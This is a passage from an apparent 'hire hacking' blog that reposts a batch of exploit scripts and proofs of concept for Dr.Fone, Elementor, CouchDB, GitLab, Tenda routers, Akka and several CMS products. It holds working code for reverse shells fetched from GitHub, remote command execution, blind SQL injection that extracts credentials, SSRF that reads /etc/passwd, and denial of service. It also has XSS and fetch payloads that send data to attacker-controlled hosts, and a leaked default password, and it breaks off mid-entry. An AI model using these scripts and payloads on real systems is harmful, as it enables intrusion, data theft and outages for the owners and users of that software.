Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863130446

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
# Date: 4/27/2022
# Exploit Author: Netanel Cohen & Tomer Peled
# Vendor Homepage: https://drfone.wondershare.net/
# Software Link: https://download.wondershare.net/drfone_full4008.exe
# Version: up to 12.0.7
# Tested on: Windows 10
# CVE : 2021-44595
# References: https://github.com/netanelc305/WonderShell

#Wondershare Dr. Fone Latest version as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to the ElevationService.exe and #execute arbitrary code without any validation with SYSTEM privileges.

#!/bin/python3
import msgpackrpc

LADDR = "192.168.14.129"
LPORT =  1338

RADDR = "192.168.14.137"
RPORT = 12345

param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}"
client = msgpackrpc.Client(msgpackrpc.Address(RADDR, 12345))
result = client.call('system_s','powershell',param)

# stty raw -echo; (stty size; cat) | nc -lvnp 1338
HireHackking 
# Exploit Title: WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/16/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://elementor.com/
# Software Link: https://wordpress.org/plugins/elementor/advanced/ (scroll down to select the version)
# Version: 3.6.0, 3.6.1, 3.62
# Tested on: WordPress 5.9.3 (os-independent since this exploit does NOT provide the payload)

#!/usr/bin/python
import requests
import re

# WARNING: This exploit does NOT include the payload.
# Also, be sure you already have some valid credentials. This exploit needs an account in order to work.

# # # # # VULNERABILITY DESCRIPTION # # # # #
# The WordPress plugin called Elementor (v. 3.6.0, 3.6.1, 3.6.2) has a vulnerability that allows any authenticated user to upload and execute any PHP file.
# This vulnerability, in the OWASP TOP 10 2021, is placed in position #1 (Broken Access Control)
# The file that contains this vulnerability is elementor/core/app/modules/onboarding/module.php
#
# At the end of this file you can find this code:
#	add_action( 'admin_init', function() {
#			if ( wp_doing_ajax() &&
#				isset( $_POST['action'] ) &&
#				isset( $_POST['_nonce'] ) &&
#				wp_verify_nonce( $_POST['_nonce'], Ajax::NONCE_KEY )
#			) {
#				$this->maybe_handle_ajax();
#			}
#		} );
#
# This code is triggered whenever ANY user account visits /wp-admin
# In order to work we need the following 4 things:
# 1. The call must be an "ajax call" (wp_doing_ajax()) and the method must be POST. In order to do this, we only need to call /wp-admin/admin-ajax.php
# 2. The parameter "action" must be "elementor_upload_and_install_pro" (check out the function named maybe_handle_ajax() in the same file)
# 3. The parameter "_nonce" must be retrieved after login by inspecting the /wp-admin page (this exploit does this in DoLogin function)
# 4. The parameter "fileToUpload" must contain the ZIP archive we want to upload (check out the function named upload_and_install_pro() in the same file)
#
# The file we upload must have the following structure:
# 1. It must be a ZIP file. You can name it as you want.
# 2. It must contain a folder called "elementor-pro"
# 3. This folder must contain a file named "elementor-pro.php"# This file will be YOUR payload (e.g. PHP Reverse Shell or anything else)
# 4. The payload must contain AT LEAST the plugin name, otherwise WordPress will NOT accept it and the upload will FAIL
# e.g.
# <?php
# /**
# * Plugin Name: Elementor Pro
# */
# // Actual PHP payload
# ?>
# This file will be YOUR payload (e.g. PHP Reverse Shell or anything else)
#
# WARNING: The fake plugin we upload will be activated by Elementor, this means that each time we visit any page we trigger our payload.
# If it tries, for example, to connect to an offline host, it could lead to a Denial of Service.
# In order to prevent this, I suggest you to use some variable to activate the payload.
# Something like this (visit anypage.php?activate=1 in order to continue with the actual payload):
# if (!isset($_GET['activate']))
#	return;

# Change the following 4 variables:
payloadFileName = 'elementor-pro.zip' # Change this with the path of the ZIP archive that contains your payload
baseUrl = 'http://192.168.56.103/wordpress/' # Change this with the base url of the target
username = 'guest' # Change this with the username you want to use to log in
password = 'test' # Change this with the password you want to use to log in
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

session = requests.Session()
cookies = { 'wordpress_test_cookie' : 'WP+Cookie+check' } # WordPress needs this to tell if browser can manage cookies

def DoLogin(username, password):
	global cookies
	loginUrl = baseUrl + 'wp-login.php'
	adminUrl = baseUrl + 'wp-admin/'
	data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : adminUrl, 'testcookie' : 1 }
	
	# search for: "ajax":{"url":"http:\/\/baseUrl\/wp-admin\/admin-ajax.php","nonce":"4e8878bdba"}
	# 4e8878bdba is just an example of nonce. It can be anything else.
	regexp = re.compile('"ajax":\\{"url":".+admin\\-ajax\\.php","nonce":"(.+)"\\}') 
	response = session.post(loginUrl, cookies=cookies, data=data)

	search = regexp.search(response.text)

	if not search:
		# I've tested this on WordPress v. 5.9.3
		# Fix the regexp if needed.
		print('Error - Invalid credentials?')
		#print(response.text)
	else:
		return search.group(1)

def UploadFile(fileName, nonce):
	uploadUrl = baseUrl + 'wp-admin/admin-ajax.php'
	data = { 'action' : 'elementor_upload_and_install_pro', '_nonce' : nonce }
	files = { 'fileToUpload' : open(fileName, 'rb') }
	regexp = re.compile('"elementorProInstalled":true') # search for: "elementorProInstalled":true
	response = session.post(uploadUrl, data=data, files=files)

	search = regexp.search(response.text)

	if not search:
		# If Elemento Pro is already installed, the upload will fail.
		# You can print the response to investigate further
		print ('Error - Upload failed')
		# print (response.text)
		return False
	else:
		print ('Upload completed successfully!')
		return True

# Define YOUR method to activate your payload (if needed)
def ActivatePayload():
	payloadUrl = baseUrl + 'index.php?activate=1'
	session.get(payloadUrl)

	
print('Trying to login...')
nonce = DoLogin(username, password)
print('Nonce found: ' + nonce)

print('Uploading payload...')
fileUploaded = UploadFile(payloadFileName, nonce)

# Define YOUR method to activate your payload (if needed)
if fileUploaded:
	print ('Activating payload...')
	ActivatePayload()
HireHackking 
# Exploit Title: EaseUS Data Recovery - 'ensserver.exe'  Unquoted Service Path
# Discovery by: bios
# Discovery Date: 2022-18-04
# Vendor Homepage: https://www.easeus.com/
# Tested Version: 15.1.0.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto
| findstr /i /v "C:\Windows\\" | findstr /i /v """
EaseUS UPDATE SERVICE
        EaseUS UPDATE SERVICE                     C:\Program Files
(x86)\EaseUS\ENS\ensserver.exe                                          Auto

C:\>sc qc "EaseUS UPDATE SERVICE"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: EaseUS UPDATE SERVICE
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\EaseUS\ENS\ensserver.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : EaseUS UPDATE SERVICE
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo

Host Name:                 DESKTOP-HR3T34O
OS Name:                   Microsoft Windows 10 Home
OS Version:                10.0.19042 N/A Build 19042
HireHackking 
# Exploit Title: Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)# Google Dork: NA
# Date: 11/03/2022
# Exploit Author: Ali J
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.5.0
# Version: 1.5.0
# Tested on: Windows 10

Steps to Reproduce:
1. Login with user 1 and navigate to localhost/FUEL-CMS/fuel/sitevariables
2. Select any variable, click on delete button and select "yes, delete it". Intercept this request and generate a CSRF POC for this. After that drop the request.
3. Login with user 2 in a seperate browser and execute the CSRF POC. 
4. Observe that the site variable has been deleted. To confirm, login with user 1 again and observe that the variable has been deleted from site variables.
HireHackking

Gitlab 14.9 - Authentication Bypass

HACKER · %s · %s

# Exploit Title: Gitlab 14.9 - Authentication Bypass # Date: 12/04/2022 # Exploit Authors: Greenwolf # Vendor Homepage: https://about.gitlab.com/ # Software Link: https://about.gitlab.com/install # Version: GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 # Tested on: Linux # CVE : CVE-2022-1162 # References: https://github.com/Greenwolf/CVE-2022-1162 A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts. Exploit: New Gitlab Accounts (created since the first affect version and if Gitlab is before the patched version) can be logged into with the following password: 123qweQWE!@#000000000
HireHackking

PTPublisher v2.3.4 - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: PTPublisher v2.3.4 - Unquoted Service Path # Discovery by: bios # Discovery Date: 2022-18-04 # Vendor Homepage: https://www.primera.com/ # Tested Version: 2.3.4 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Pro x64 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ PTProtect PTProtect C:\Program Files (x86)\Primera Technology\PTPublisher\UsbFlashDongleService.exe Auto C:\>sc qc PTProtect [SC] QueryServiceConfig SUCCESS SERVICE_NAME: PTProtect TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\PrimeraTechnology\PTPublisher\UsbFlashDongleService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : PTProtect DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo Host Name: DESKTOP-OUHAB1I OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19044 N/A Build 19044
HireHackking

Akka HTTP 10.1.14 - Denial of Service

HACKER · %s · %s

# Exploit Title: Akka HTTP Denial of Service via Nested Header Comments # Date: 18/4/2022 # Exploit Author: cxosmo # Vendor Homepage: https://akka.io # Software Link: https://github.com/akka/akka-http # Version: Akka HTTP 10.1.x < 10.1.15 & 10.2.x < 10.2.7 # Tested on: Akka HTTP 10.2.4, Ubuntu # CVE : CVE-2021-42697 import argparse import logging import requests # Logging config logging.basicConfig(level=logging.INFO, format="") log = logging.getLogger() def send_benign_request(url, verify=True): log.info(f"Sending benign request to {url} for checking reachability...") try: r = requests.get(url) log.info(f"Benign request returned following status code: {r.status_code}") return True except Exception as e: log.info(f"The following exception was encountered: {e}") return False def send_malicious_request(url, verify=True): log.info(f"Sending malicious request to {url}") # Akka has default HTTP header limit of 8192; 8191 sufficient to trigger stack overflow per 10.2.4 testing nested_comment_payload = "("*8191 headers = {'User-Agent': nested_comment_payload} try: r = requests.get(url, headers=headers) log.info(f"Request returned following status code: {r.status_code}") # Expected exception to be returned if server is DoSed successfully except requests.exceptions.RequestException as e: if "Remote end closed connection without response" in str(e): log.info(f"The server is unresponsive per {e}: DoS likely successful") except Exception as e: log.info(f"The following exception was encountered: {e}") if __name__ == "__main__": # Parse command line parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter) required_arguments = parser.add_argument_group('required arguments') required_arguments.add_argument("-t", "--target", help="Target URL for vulnerable Akka server (e.g. https://localhost)", required="True", action="store") parser.add_argument("-k", "--insecure", help="Disable verification of SSL/TLS certificate", action="store_false", default=True) args = parser.parse_args() # Send requests: first is connectivity check, second is DoS attempt if send_benign_request(args.target, args.insecure): send_malicious_request(args.target, args.insecure)
HireHackking

WebTareas 2.4 - Blind SQLi (Authenticated)

HACKER · %s · %s

# Exploit Title: WebTareas 2.4 - Blind SQLi (Authenticated) # Date: 04/20/2022 # Exploit Author: Behrad Taher # Vendor Homepage: https://sourceforge.net/projects/webtareas/ # Version: < 2.4p3 # CVE : CVE-2021-43481 #The script takes 3 arguments: IP, user ID, session ID #Example usage: python3 webtareas_sqli.py 127.0.0.1 1 4au5376dddr2n2tnqedqara89i import requests, time, sys from bs4 import BeautifulSoup ip = sys.argv[1] id = sys.argv[2] sid = sys.argv[3] def sqli(column): print("Extracting %s from user with ID: %s\n" % (column,id)) extract = "" for i in range (1,33): #This conditional statement will account for variable length usernames if(len(extract) < i-1): break for j in range(32,127): injection = "SELECT 1 and IF(ascii(substring((SELECT %s FROM gW8members WHERE id=1),%d,1))=%d,sleep(5),0);" % (column,i,j) url = "http://%s/approvals/editapprovaltemplate.php?id=1" % ip GET_cookies = {"webTareasSID": "%s" % sid} r = requests.get(url, cookies=GET_cookies) #Because the app has CSRF protection enabled we need to send a get request each time and parse out the CSRF Token" token = BeautifulSoup(r.text,features="html.parser").find('input', {'name':'csrfToken'})['value'] #Because this is an authenticated vulnerability we need to provide a valid session token POST_cookies = {"webTareasSID": "%s" % sid} POST_data = {"csrfToken": "%s" % token, "action": "update", "cd": "Q", "uq": "%s" % injection} start = time.time() requests.post(url, cookies=POST_cookies, data=POST_data) end = time.time() - start if end > 5: extract += chr(j) print ("\033[A\033[A") print(extract) break #Modularized the script for login and password values sqli("login") sqli("password")
HireHackking

Bookeen Notea - Directory Traversal

HACKER · %s · %s

# Exploit Title: Bookeen Notea - Directory Traversal # Date: December 2021 # Exploit Author: Clement MAILLIOUX # Vendor Homepage: https://bookeen.com/ # Software Link: N/A # Version: BK_R_1.0.5_20210608 # Tested on: Bookeen Notea (Android 8.1) # CVE : CVE 2021-45783 # The affected version of the Bookeen Notea System Update is prone to directory traversal vulnerability related to its note Export function. # The vulnerability can be triggered like so : # - Create a note or use an existing note on the device # - rename this note ../../../../../../ # - keep touching the note until a menu appears # - touch to select "export" # - touch "View" # Now you can access and explore the device filesystem.
HireHackking
# Exploit Title: WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated) # Google Dork: - # Date: 2022-03-13 # Exploit Author: Roel van Beurden # Vendor Homepage: - # Software Link: https://downloads.wordpress.org/plugin/advanced-uploader.4.2.zip # Version: <=4.2 # Tested on: WordPress 5.9 on Ubuntu 18.04 # CVE: CVE-2022-1103 1. Description: ---------------------- WordPress Plugin Advanced Uploader <=4.2 allows authenticated arbitrary file upload. Any file(type) can be uploaded. A malicious user can perform remote code execution on the backend webserver. 2. Proof of Concept: ---------------------- - Upload file/webshell/backdoor with the Advanced Uploader plugin; - File is uploaded in the Wordpress Media Library; - Go to /wp-content/uploads/ where the file is saved; - Click on the uploaded file for whatever it's supposed to do (RCE, reverse shell). 3. Exploitation demo: ---------------------- https://www.youtube.com/watch?v=Bwpf-IpxtXQ
HireHackking

Apache CouchDB 3.2.1 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE) # Date: 2022-01-21 # Exploit Author: Konstantin Burov, @_sadshade # Software Link: https://couchdb.apache.org/ # Version: 3.2.1 and below # Tested on: Kali 2021.2 # Based on 1F98D's Erlang Cookie - Remote Code Execution # Shodan: port:4369 "name couchdb at" # CVE: CVE-2022-24706 # References: # https://habr.com/ru/post/661195/ # https://www.exploit-db.com/exploits/49418 # https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ # https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce # # #!/usr/local/bin/python3 import socket from hashlib import md5 import struct import sys import re import time TARGET = "" EPMD_PORT = 4369 # Default Erlang distributed port COOKIE = "monster" # Default Erlang cookie for CouchDB ERLNAG_PORT = 0 EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list # Some data: NAME_MSG = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA" CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04" CTRL_DATA = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03" CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex" def compile_cmd(CMD): MSG = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00" MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k" MSG += struct.pack(">H", len(CMD)) MSG += bytes(CMD, 'ascii') MSG += b'jw\x04user' PAYLOAD = b'\x70' + CTRL_DATA + MSG PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD return PAYLOAD print("Remote Command Execution via Erlang Distribution Protocol.\n") while not TARGET: TARGET = input("Enter target host:\n> ") # Connect to EPMD: try: epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) epm_socket.connect((TARGET, EPMD_PORT)) except socket.error as msg: print("Couldnt connect to EPMD: %s\n terminating program" % msg) sys.exit(1) epm_socket.send(EPM_NAME_CMD) #request Erlang nodes if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK data = epm_socket.recv(1024) data = data[0:len(data) - 1].decode('ascii') data = data.split("\n") if len(data) == 1: choise = 1 print("Found " + data[0]) else: print("\nMore than one node found, choose which one to use:") line_number = 0 for line in data: line_number += 1 print(" %d) %s" %(line_number, line)) choise = int(input("\n> ")) ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0]) else: print("Node list request error, exiting") sys.exit(1) epm_socket.close() # Connect to Erlang port: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET, ERLNAG_PORT)) except socket.error as msg: print("Couldnt connect to Erlang server: %s\n terminating program" % msg) sys.exit(1) s.send(NAME_MSG) s.recv(5) # Receive "ok" message challenge = s.recv(1024) # Receive "challenge" message challenge = struct.unpack(">I", challenge[9:13])[0] #print("Extracted challenge: {}".format(challenge)) # Add Challenge Digest CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest() s.send(CHALLENGE_REPLY) CHALLENGE_RESPONSE = s.recv(1024) if len(CHALLENGE_RESPONSE) == 0: print("Authentication failed, exiting") sys.exit(1) print("Authentication successful") print("Enter command:\n") data_size = 0 while True: if data_size <= 0: CMD = input("> ") if not CMD: continue elif CMD == "exit": sys.exit(0) s.send(compile_cmd(CMD)) data_size = struct.unpack(">I", s.recv(4))[0] # Get data size s.recv(45) # Control message data_size -= 45 # Data size without control message time.sleep(0.1) elif data_size < 1024: data = s.recv(data_size) #print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data))) time.sleep(0.1) print(data.decode()) data_size = 0 else: data = s.recv(1024) #print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data))) time.sleep(0.1) print(data.decode(),end = '') data_size -= 1024
HireHackking

PyScript - Read Remote Python Source Code

HACKER · %s · %s

# Exploit Title: PyScript Remote Emscripten VMemory Python libraries Source Codes Read # Date: 5-9-2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://pyscript.net/ # Software Link: https://github.com/pyscript/pyscript # Version: 2022-05-04-Alpha # Tested on: Ubuntu Apache Server # CVE : CVE-2022-30286 <py-script> x = "CyberGuy" if x == "CyberGuy": with open('/lib/python3.10/asyncio/tasks.py') as output: contents = output.read() print(contents) print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://YOURburpcollaborator.net/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>') </py-script>
HireHackking

Tenda HG6 v3.3.0 - Remote Command Injection

HACKER · %s · %s

# Exploit Title: Tenda HG6 v3.3.0 - Remote Command Injection # Exploit Author: LiquidWorm Tenda HG6 v3.3.0 Remote Command Injection Vulnerability Vendor: Tenda Technology Co.,Ltd. Product web page: https://www.tendacn.com https://www.tendacn.com/product/HG6.html Affected version: Firmware version: 3.3.0-210926 Software version: v1.1.0 Hardware Version: v1.0 Check Version: TD_HG6_XPON_TDE_ISP Summary: HG6 is an intelligent routing passive optical network terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE), a voice port to meet users' requirements for enjoying the Internet, HD IPTV and VoIP multi-service applications. Desc: The application suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces. Tested on: Boa/0.93.15 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5706 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php 22.04.2022 -- ping.asp: --------- POST /boaform/formPing HTTP/1.1 Host: 192.168.1.1 pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564 --- TZ app.gwdt bftpd.conf buildtime check_version.txt config config.csv config_default.xml config_default_hs.xml dhclient-script dnsmasq.conf ethertypes factory_default.xml ftpdpassword group hardversion inetd.conf init.d inittab innversion insdrv.sh irf mdev.conf omci_custom_opt.conf omci_ignore_mib_tbl.conf omci_ignore_mib_tbl_10g.conf omci_mib.cfg orf passwd ppp profile protocols radvd.conf ramfs.img rc_boot_dsp rc_voip release_date resolv.conf rtk_tr142.sh run_customized_sdk.sh runoam.sh runomci.sh runsdk.sh samba scripts services setprmt_reject shells simplecfgservice.xml smb.conf softversion solar.conf solar.conf.in ssl_cert.pem ssl_key.pem version wscd.conf ping6.asp: ---------- POST /boaform/formPing6 HTTP/1.1 Host: 192.168.1.1 pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp --- boa.conf web tracert.asp: ------------ POST /boaform/formTracert HTTP/1.1 Host: 192.168.1.1 traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp --- /home/httpd tracert6.asp: ------------- POST /boaform/formTracert6 HTTP/1.1 Host: 192.168.1.1 traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp --- admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh nobody:x:0:0::/tmp:/dev/null user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh
HireHackking

Explore CMS 1.0 - SQL Injection

HACKER · %s · %s

# Exploit Title: Explore CMS 1.0 - SQL Injection # Date: 19/03/2022 # Exploit Author: Sajibe Kanti # Vendor Name : EXPLORE IT # Vendor Homepage: https://exploreit.com.bd # CVE: CVE-2022-27412 # POC # SQL Injection SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. explore CMS is vulnerable to the SQL Injection in 'id' parameter of the 'page' page. #Steps to reproduce Following URL is vulnerable to SQL Injection in the 'id' field. GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1 Host: REDACTED Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320 Referer: REDACTED User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 HTTP/1.1 200 OK content-encoding: server: LiteSpeed Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html; charset=UTF-8 transfer-encoding: chunked date: Thu, 17 Mar 2022 07:27:21 GMT vary: Accept-Encoding 10.3.34-MariaDB Server accepts the payload and the response get delayed by 7 seconds.
HireHackking
#!/usr/bin/env python3 # Exploit Title: Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated) # Exploit Author: cheshireca7 # Vendor Homepage: https://www.navigatecms.com/ # Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.9.4r1561.zip/download # Version: 2.9.4 and earlier # Tested on: Ubuntu 20.04 # CVE: CVE-2022-28117 # # -*- coding: utf-8 -*- import requests as r, signal from emoji import emojize from argparse import ArgumentParser from sys import exit from requests_toolbelt.multipart.encoder import MultipartEncoder from hashlib import md5 from time import sleep from base64 import b64decode,b64encode from colorama import Fore, Style #proxies = {'http':'http://127.0.0.1:8080'} def handler(signum, frame): print("["+Fore.YELLOW+"!"+Style.RESET_ALL+"] "+emojize(b64decode("T2gsIHlvdSBjYW7igJl0IGhlbHAgdGhhdCwgd2UncmUgYWxsIG1hZCBoZXJlIC4uLiA6cGF3X3ByaW50czoK").decode('UTF-8'))) exit() def login(): print("["+Fore.BLUE+"*"+Style.RESET_ALL+f"] Trying to authenticate as {args.username} ...") sleep(1) try: # Grabbing CSRF Token s = r.Session() resp = s.get(f"{args.target}/login.php")#, proxies=proxies) csrf_token = resp.headers['X-Csrf-Token'] # Performing login data = MultipartEncoder(fields={'login-username':f"{args.username}",'csrf_token':f"{csrf_token}",'login-password':f"{args.password}"}) headers = {'Content-Type':data.content_type} resp = s.post(f"{args.target}/login.php", data=data, headers=headers, allow_redirects=False)#, proxies=proxies) except: print("["+Fore.RED+"!"+Style.RESET_ALL+"] Something went wrong performing log in") exit(-1) if resp.status_code == 302: print("["+Fore.GREEN+"+"+Style.RESET_ALL+"] Login successful!") for cookie in resp.cookies: if "NVSID" in cookie.name: return (resp.headers['X-Csrf-Token'],f"{cookie.name}={cookie.value}") else: print("["+Fore.RED+"!"+Style.RESET_ALL+f"] Incorrect {args.username}'s credentials") exit(-1) def exploit(values): print("["+Fore.BLUE+"*"+Style.RESET_ALL+"] Performing SSRF ...") sleep(1) # Abusing cache feature to retrieve response data = {'limit':'5','language':'en','url':f'{args.payload}'} headers = {'X-Csrf-Token':values[0]} cookies = {values[1].split('=')[0]:values[1].split('=')[1]} resp = r.post(f"{args.target}/navigate.php?fid=dashboard&act=json&oper=feed", cookies=cookies, headers=headers, data=data)#, proxies=proxies) # Retrieving the file with response from static route md5File = md5(f"{args.payload}".encode('UTF-8')).hexdigest() resp = r.get(f"{args.target}/private/1/cache/{md5File}.feed",cookies=cookies)#,proxies=proxies) if len(resp.text) > 0: print("["+Fore.GREEN+"+"+Style.RESET_ALL+"] Dumping content ...") sleep(1) print(f"\n{resp.text}") exit(0) else: print("["+Fore.RED+"!"+Style.RESET_ALL+"] No response received") exit(-1) if __name__ == '__main__': # Define parameters signal.signal(signal.SIGINT, handler) parser = ArgumentParser(description='CVE-2022-28117: Navigate CMS <= 2.9.4 - Server-Side Request Forgery (Authenticated)') parser.add_argument('-x', '--payload',default='file:///etc/passwd', help='URL to be requested (default=file:///etc/passwd)') parser.add_argument('-u','--username', default='admin', help='Username to log in the CMS (default=admin)') parser.add_argument('-p','--password', required=True, help='Password to log in the CMS') parser.add_argument('target', help='URL where the CMS is hosted. Ex: http://example.com[:80]/navigate') args = parser.parse_args() exploit(login())
HireHackking

GitLab 14.9 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Gitlab Stored XSS # Date: 12/04/2022 # Exploit Authors: Greenwolf # Vendor Homepage: https://about.gitlab.com/ # Software Link: https://about.gitlab.com/install # Version: GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2 # Tested on: Linux # CVE : CVE-2022-1175 # References: https://github.com/Greenwolf/CVE-2022-1175 Any user can create a project with Stored XSS in an issue. XSS on Gitlab is very dangerous and it can create personal access tokens leading users who visit the XSS page to silently have the accounts backdoor. Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change javascript on your site to match the script names being called in the page. This can break things on the page though. <pre data-sourcepos=""%22 href="x"></pre><base href=http://unsafe-website.com/><pre x=""><code></code></pre> Standard script include also works depending on the sites CSP policy. This is more stealthy. <pre data-sourcepos=""%22 href="x"></pre><script src="https://attacker-site.com/bad.js"></script><pre x=""><code></code></pre>
HireHackking

ImpressCMS v1.4.4 - Unrestricted File Upload

HACKER · %s · %s

# Exploit Title: ImpressCMS v1.4.4 - Unrestricted File Upload # Date: 7/4/2022 # Exploit Author: Ünsal Furkan Harani (Zemarkhos) # Vendor Homepage: https://www.impresscms.org/ # Software Link: https://github.com/ImpressCMS/impresscms # Version: v1.4.4 # Description: Between lines 152 and 162, we see the function "extensionsToBeSanitized".Since the blacklist method is weak, it is familiar that the file can be uploaded in the extensions mentioned below. .php2, .php6, .php7, .phps, .pht, .pgif, .shtml, .htaccess, .phar, .inc Impresscms/core/File/MediaUploader.php Between lines 152 and 162: private $extensionsToBeSanitized = array('php','phtml','phtm','php3','php4','cgi','pl','asp','php5');
HireHackking

Microfinance Management System 1.0 - 'customer_number' SQLi

HACKER · %s · %s

# Exploit Title: Microfinance Management System 1.0 - 'customer_number' SQLi # Date: 2022-25-03 # Exploit Author: Eren Gozaydin # Vendor Homepage: https://www.sourcecodester.com/php/14822/microfinance-management-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip # Version: 1.0 # Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 # CVE: CVE-2022-27927 # References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927 ------------------------------------------------------------------------------------ 1. Description: ---------------------- Microfinance Management System allows SQL Injection via parameter 'customer_number' in /mims/updatecustomer.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from the affected page with 'customer_number' parameter and save it like poc.txt Then run 